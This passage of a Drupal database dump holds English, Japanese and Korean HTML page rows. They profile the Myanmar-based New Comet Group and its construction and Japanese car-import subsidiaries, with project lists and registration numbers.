style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;New Comet Trading Agency Co.,Ltd</span></li></ol><hr><blockquote><ol><li class=\"MsoListParagraph\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><strong>&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</strong></li></ol></blockquote><p class=\"MsoNormal\">New comet construction Co.Ltd was founded in 2004 with company Licence ( 295/ 2004-2005) and started operation construction projects , Import and sale of construction and industrial machinery and vehicles based in Yangon, Mandalay, Ayawaddy, Nay Pyi Taw, Sagaing States etc.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Some of the construction works completed by us in the financial year (2013-2014) and (2014-2015) by our ``New Comet Construction\'\' Co.,Ltd are:&nbsp;<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">Nationalities Youth Resource Development Degree College ( Sagaing)</span><o:p></o:p></p><p class=\"MsoNormal\">• Sagaing University (two storyed classroom)<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">A joint venture housing project between Road Transport Administration Department and NEW COMET Construction Co.Ltd</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">In addition to the above projects :&nbsp;</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Departmental and private building construction and repair works</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of affordable housing for ex-employees in cities in Irrawaddy Region</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Architectural design modeling</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of buildings and roads and bridges continues to be carried out according to standards with veteran consultants, professional engineers, management office staff, project supervisors from the region and other regions, skilled workers and modern equipment</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Our company has been doing charity work for as long as it is capable of designing and calculating the strength of related religious buildings, hospitals and schools.</span><o:p></o:p></p><img data-entity-uuid=\"5e3bf389-81a5-4292-a72d-28d1bf22ef1d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-24dbe4bb16d2a54ef691fbd31c4506732ff80a2f3712b90f57ccc8ce4dfe77f9_a0b22c95737fa277_1.jpg\"><img data-entity-uuid=\"83a7a618-267a-4d19-b5cb-103c96bde9c6\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-34e6e44107bf86b41d53ccce9f0f2bb42f7320cc464153877247fe33d75f6263_6d68ee0d1d03ab44_1.jpg\" alt=\"\"><blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">2. <strong>New Zayya Shwe Pyi Construction Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"mso-spacerun:yes;\">&nbsp;</span>New Zayya Shwe Pyi Construction Co.,Ltd was founded in May 30<sup>th</sup>, 2001 with Company Registration Number (191/ 2001-2002). We standed as one of the trustful companies and completed projects in educational, health care, industrial buildings, private housing, high rise condominium in both public and private sectors.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Throughout our existence, we had been praised by our clients for our attention to detail and our ability to provide knowledge driven and cost saving solutions for the complex construction projects. We built projects in areas such as Education, Health Care, Industrial Housing.<o:p></o:p></p><p class=\"MsoNormal\">Our Services are:<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Pre Construction-Service&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;General Contractor<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Design Builder</li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; Construction Manager</span></li></ul><img data-entity-uuid=\"1631c2b9-9924-4aab-b3bb-4d5579c0eb93\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-d8522b37b78efc78db7acdeb6859eb6dac6f17114ea9d9e8132582658b69e57d_828dd20036b8de29_1.jpg\"><blockquote><p>3. <strong>Aung Nay Wun Construction Co., Ltd</strong></p></blockquote><p class=\"MsoNormal\" style=\"margin-left:.5in;\">Aung Nay Wun Construction Co.,Ltd was founded in 2005 with company registration Number (265/ 2005-2006) emphasizing in residential, commercial, construction and interior design in private and government sectors. Some of the projects we have constructed are as follow:&nbsp;<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Nay-Pyi-Taw Staff Housing Project<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Yandanar Pone College in Mandalay<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fire Station in Myawaddy Division<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Basic Education Middle, High Schools in various towns. (32 in total)<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fair-priced Housing Projects<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Private Housing<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Projects in Health Industry&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Two storied Building (Technical School At Bo-Ka-Lay)<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Two Storied RCC Building (MaUPin)</li></ul><img data-entity-uuid=\"20b6da4e-c701-4daa-8959-3e114cd48f39\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-e82a8d4b88a3246f463cbabfb97d7c5e1e6062591670b60167a39b47ddfa620d_ef0c059dbd11ee9a_1.jpg\"><blockquote><p>4. <strong>Zeya New Comet Auto Sale &amp; Services Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoListParagraphCxSpFirst\">Our Auto Trade Company was built from 1987 by buying permit of crew permit and importation and brother company New Comet Company Ltd. At 1990 established and private car, saloon car, truck car, bus car and spare-part importation from Japan. Besides Zeya New Comet Company we cooperate with other NEW ZAYYA SHWEPYI Company, AUNG NAY WIN Company, Tai Myint Aung Company made importation of private car, truck, Bus and spare-part from Japan for (25) years with the employment of 100 workers and purchase of import permit from Ministry of Commerce.&nbsp;<o:p></o:p></p><p class=\"MsoListParagraphCxSpLast\">Our ZEYA NEW COMET Auto Services Company appointed expert staff and import Japan Car for smooth operation for customer satisfaction.&nbsp;</p><img data-entity-uuid=\"b1102bb9-63fa-41f5-9292-67dfc6239747\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-18c51a8d67a390f18922d18beb910acd2a525cc797c8808eda202c393b52cf73_c5db29096f9c0740_1.jpg\" alt=\"\"><img data-entity-uuid=\"cd2c5107-dba9-44f1-9cc3-01a08979cc62\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-349a229a5607a0188a33a1c37d44950447b7e0f162a2fa88997b1fe702c7a628_22a1876ac9fe1a52_1.jpg\" alt=\"\"><img data-entity-uuid=\"10f2be9d-c5c4-4879-ba8f-9d4d56966d53\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-25fbfa2a530d20c01a2685b859a828df0faf3a9d75afd0639a5b72797d560221_8ddad4e328e0428a_1.jpg\"><hr><p class=\"MsoListParagraphCxSpLast\"><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 27, 256, 'ja', 0, '<p>&nbsp;&nbsp; <img src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc_0.jpg\" data-entity-uuid=\"1153a72f-a283-46f1-a351-b0da59976c09\" data-entity-type=\"file\" width=\"100%\"> 「ニュー コメット グループ企業」は 1996 年に設立され、以下の支店で組織されています。<br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」<br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」<br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」<br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」<br>5.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット トレーディング エージェンシー 株式会社」</p><blockquote><h5><br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」</h5></blockquote><p><br>当社の「ニュー コメット コンストラクション株式会社」は2004年に会社登録番号(295/2004-2005)で事業を開始し、ヤンゴン地方域、エーヤーワディ地方域、ザガイン地方域、マンダレー地方域 とネピドー連合領土を拠点に自動車販売と建設機械の輸入、建設業を営んでおります。<br>当社「ニュー コメット コンストラクション株式会社」の2013-2014年と2014-2015年の竣工工事の一部は以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;国籍青少年資源開発大学(ザガイン)<br>-&nbsp;&nbsp;&nbsp;&nbsp;ザガイン大学 (教育と学習のための2階建ての建物)<br>-&nbsp;&nbsp;&nbsp;&nbsp;道路交通総局と「チェタゴンティッ建設会社」の住宅プロジェクト協力<br>&nbsp; &nbsp; &nbsp;上記の活動に加えて、</p><p>-&nbsp;&nbsp;&nbsp;&nbsp;政府機関および民間の建物の修繕工事<br>-&nbsp;&nbsp;&nbsp;&nbsp;エーヤーワディ地方域で元従業員向けに手頃な価格の住宅を建設<br>-&nbsp;&nbsp;&nbsp;&nbsp;建築設計図<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は、専門コンサルタント、専門作業員、管理責任者、工事監督者、その<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;他国内外の労働者とともに、基準に沿って最新化された資機材により、<br>&nbsp; &nbsp; &nbsp;建物、道路、橋梁の建設工事を行っております。<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は理念建築、病院、学校の設計図作成、強度計算などの慈善事業を可能<br>&nbsp;&nbsp;&nbsp;&nbsp;な限り手掛けさせていただきました。</p><img data-entity-uuid=\"e508c31a-701c-4124-88ad-65e8f89a0966\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-24dbe4bb16d2a54ef691fbd31c4506732ff80a2f3712b90f57ccc8ce4dfe77f9_a0b22c95737fa277_0.jpg\"><img data-entity-uuid=\"48b01d95-2c64-40d0-b4ef-7373eae814c2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-34e6e44107bf86b41d53ccce9f0f2bb42f7320cc464153877247fe33d75f6263_6d68ee0d1d03ab44_0.jpg\"><blockquote><h5><br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤーシュエ ピィーコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」は 2000 年 5 月 30 日に設立され、会社登録番号は(191/2001-2002)です。当社は信頼できる企業の一つであり、教育、医療、産業建築、個人住宅を提供しており、政府および民間部門の両方で多くのプロジェクトが実施されています。会社の存続期間を通じて、複雑な建設プロジェクトにおける当社の細部へのこだわりと専門知識。 当社はコスト削減ソリューションを提供する能力でクライアントから多くの賞賛を受けています。教育、医療、工業用住宅など、多くのプロジェクトを建設してきました。<br>私たちは、<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設前サービス<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;土建屋<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;デザインビルダー<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設部長を提供させていただきました。</p><img data-entity-uuid=\"58de38f3-2574-4b5c-843d-3230f047d610\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-d8522b37b78efc78db7acdeb6859eb6dac6f17114ea9d9e8132582658b69e57d_828dd20036b8de29_0.jpg\"><blockquote><h5><br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「アウン ネイ ワォンコンストラクション株式会社」は 2005年に設立され、会社登録番号は(265/2005-2006)です。同社は、民間および政府部門で住宅建築、商業建築、インテリアデザインのプロジェクトに従事しています。私たちのプロジェクトは以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;ネピドー職員住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;マンダレー ヤダナポン大学<br>-&nbsp;&nbsp;&nbsp;&nbsp;ミャワディ地域消防署<br>-&nbsp;&nbsp;&nbsp;&nbsp;さまざまな郡区の基礎教育中/高等学校。 (計32都市)<br>-&nbsp;&nbsp;&nbsp;&nbsp;手頃な価格の住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;民間住宅<br>-&nbsp;&nbsp;&nbsp;&nbsp;2階建ての建物 (ボガレ工科大学)<br>-&nbsp;&nbsp;&nbsp;&nbsp;RCC 2階建ての建物(マウビン)</p><img data-entity-uuid=\"fd9b3a24-223c-42c0-a54c-99865457abc5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-e82a8d4b88a3246f463cbabfb97d7c5e1e6062591670b60167a39b47ddfa620d_ef0c059dbd11ee9a_0.jpg\"><blockquote><h5><br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の自動車商社は1987年に外国人船員の名義で輸入許可証の売買を行う個人事業として設立されました。「ニュー コメット」株式会社は1990年に設立され、「ゼヤー ニュー コメット オートセールスとサービス株式会社」の子会社です。 「家庭用自動車」「各種サルーン自動車」「各種商用トラック」「観光・輸送用各種バス」「各種機械」を日本より直接仕入れ、輸入販売を開始いたしました。<br>当社「ゼヤー ニュー コメット オートセールスとサービス株式会社」には、業務を促進する資格のある従業員がいます。 お客様に十分にご満足いただけるよう、良い車を日本から直輸入しております。</p><img data-entity-uuid=\"ce131080-c99f-4c7c-8480-d2f179b93d87\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-18c51a8d67a390f18922d18beb910acd2a525cc797c8808eda202c393b52cf73_c5db29096f9c0740_0.jpg\"><img data-entity-uuid=\"ca35e4dc-753b-43ed-8048-698e92a9994d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-349a229a5607a0188a33a1c37d44950447b7e0f162a2fa88997b1fe702c7a628_22a1876ac9fe1a52_0.jpg\"><img data-entity-uuid=\"52c6749b-5faf-49ba-b3d8-8e53128b3263\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-25fbfa2a530d20c01a2685b859a828df0faf3a9d75afd0639a5b72797d560221_8ddad4e328e0428a_0.jpg\">', '', 'full_html'),
('page', 0, 27, 256, 'ko', 0, '<img data-entity-uuid=\"8ef82604-9360-40e2-94b8-357908e9ce24\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc_1.jpg\" width=\"100%\"><p>Coming soon...</p>', '', 'full_html'),
('page', 0, 27, 268, 'en', 0, '<p><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\"><img src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc.jpg\" data-entity-uuid=\"ab23ef9a-b19e-44cb-859b-9e243b2192c9\" data-entity-type=\"file\" width=\"100%\">New Comet Group of Co.,Ltd was founded in 1996 and started operation with Branches Companies as Follow:</span></p><ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Zayya Shwe Pyi Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Aung Nay Wun Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Zeya New Comet Auto Sale &amp; Services Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;New Comet Trading Agency Co.,Ltd</span></li></ol><hr><blockquote><ol><li class=\"MsoListParagraph\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><strong>&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</strong></li></ol></blockquote><p class=\"MsoNormal\">New comet construction Co.Ltd was founded in 2004 with company Licence ( 295/ 2004-2005) and started operation construction projects , Import and sale of construction and industrial machinery and vehicles based in Yangon, Mandalay, Ayawaddy, Nay Pyi Taw, Sagaing States etc.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Some of the construction works completed by us in the financial year (2013-2014) and (2014-2015) by our ``New Comet Construction\'\' Co.,Ltd are:&nbsp;<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">Nationalities Youth Resource Development Degree College ( Sagaing)</span><o:p></o:p></p><p class=\"MsoNormal\">• Sagaing University (two storyed classroom)<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">A joint venture housing project between Road Transport Administration Department and NEW COMET Construction Co.Ltd</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">In addition to the above projects :&nbsp;</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Departmental and private building construction and repair works</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of affordable housing for ex-employees in cities in Irrawaddy Region</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Architectural design modeling</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of buildings and roads and bridges continues to be carried out according to standards with veteran consultants, professional engineers, management office staff, project supervisors from the region and other regions, skilled workers and modern equipment</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Our company has been doing charity work for as long as it is capable of designing and calculating the strength of related religious buildings, hospitals and schools.</span><o:p></o:p></p><img src=\"/sites/default/files/inline-images/0-02-06-24dbe4bb16d2a54ef691fbd31c4506732ff80a2f3712b90f57ccc8ce4dfe77f9_a0b22c95737fa277_1.jpg\" data-entity-uuid=\"5e3bf389-81a5-4292-a72d-28d1bf22ef1d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-06-34e6e44107bf86b41d53ccce9f0f2bb42f7320cc464153877247fe33d75f6263_6d68ee0d1d03ab44_1.jpg\" data-entity-uuid=\"83a7a618-267a-4d19-b5cb-103c96bde9c6\" data-entity-type=\"file\" alt=\"\"><blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">2. <strong>New Zayya Shwe Pyi Construction Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"mso-spacerun:yes;\">&nbsp;</span>New Zayya Shwe Pyi Construction Co.,Ltd was founded in May 30<sup>th</sup>, 2001 with Company Registration Number (191/ 2001-2002). We standed as one of the trustful companies and completed projects in educational, health care, industrial buildings, private housing, high rise condominium in both public and private sectors.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Throughout our existence, we had been praised by our clients for our attention to detail and our ability to provide knowledge driven and cost saving solutions for the complex construction projects. We built projects in areas such as Education, Health Care, Industrial Housing.<o:p></o:p></p><p class=\"MsoNormal\">Our Services are:<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Pre Construction-Service&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;General Contractor<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Design Builder</li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; Construction Manager</span></li></ul><img src=\"/sites/default/files/inline-images/0-02-06-d8522b37b78efc78db7acdeb6859eb6dac6f17114ea9d9e8132582658b69e57d_828dd20036b8de29_1.jpg\" data-entity-uuid=\"1631c2b9-9924-4aab-b3bb-4d5579c0eb93\" data-entity-type=\"file\"><blockquote><p>3. <strong>Aung Nay Wun Construction Co., Ltd</strong></p></blockquote><p>Aung Nay Wun Construction Co.,Ltd was founded in 2005 with company registration Number (265/ 2005-2006) emphasizing in residential, commercial, construction and interior design in private and government sectors. Some of the projects we have constructed are as follow:&nbsp;<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Nay-Pyi-Taw Staff Housing Project<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Yandanar Pone College in Mandalay</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fire Station in Myawaddy Division &nbsp; &nbsp;&nbsp;</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Basic Education Middle, High Schools in various towns. (32 in total)</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Fair-priced Housing Projects&nbsp;</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Private Housing&nbsp;</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Projects in Health Industry</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Two storied Building (Technical School At Bo-Ka-Lay)&nbsp;</li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; Two Storied RCC Building (MaUPin)<o:p></o:p></li></ul><img src=\"/sites/default/files/inline-images/0-02-06-e82a8d4b88a3246f463cbabfb97d7c5e1e6062591670b60167a39b47ddfa620d_ef0c059dbd11ee9a_1.jpg\" data-entity-uuid=\"20b6da4e-c701-4daa-8959-3e114cd48f39\" data-entity-type=\"file\"><blockquote><p>4. <strong>Zeya New Comet Auto Sale &amp; Services Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoListParagraphCxSpFirst\">Our Auto Trade Company was built from 1987 by buying permit of crew permit and importation and brother company New Comet Company Ltd. At 1990 established and private car, saloon car, truck car, bus car and spare-part importation from Japan. Besides Zeya New Comet Company we cooperate with other NEW ZAYYA SHWEPYI Company, AUNG NAY WIN Company, Tai Myint Aung Company made importation of private car, truck, Bus and spare-part from Japan for (25) years with the employment of 100 workers and purchase of import permit from Ministry of Commerce.&nbsp;<o:p></o:p></p><p class=\"MsoListParagraphCxSpLast\">Our ZEYA NEW COMET Auto Services Company appointed expert staff and import Japan Car for smooth operation for customer satisfaction.&nbsp;</p><img src=\"/sites/default/files/inline-images/0-02-06-18c51a8d67a390f18922d18beb910acd2a525cc797c8808eda202c393b52cf73_c5db29096f9c0740_1.jpg\" data-entity-uuid=\"b1102bb9-63fa-41f5-9292-67dfc6239747\" data-entity-type=\"file\" alt=\"\"><img 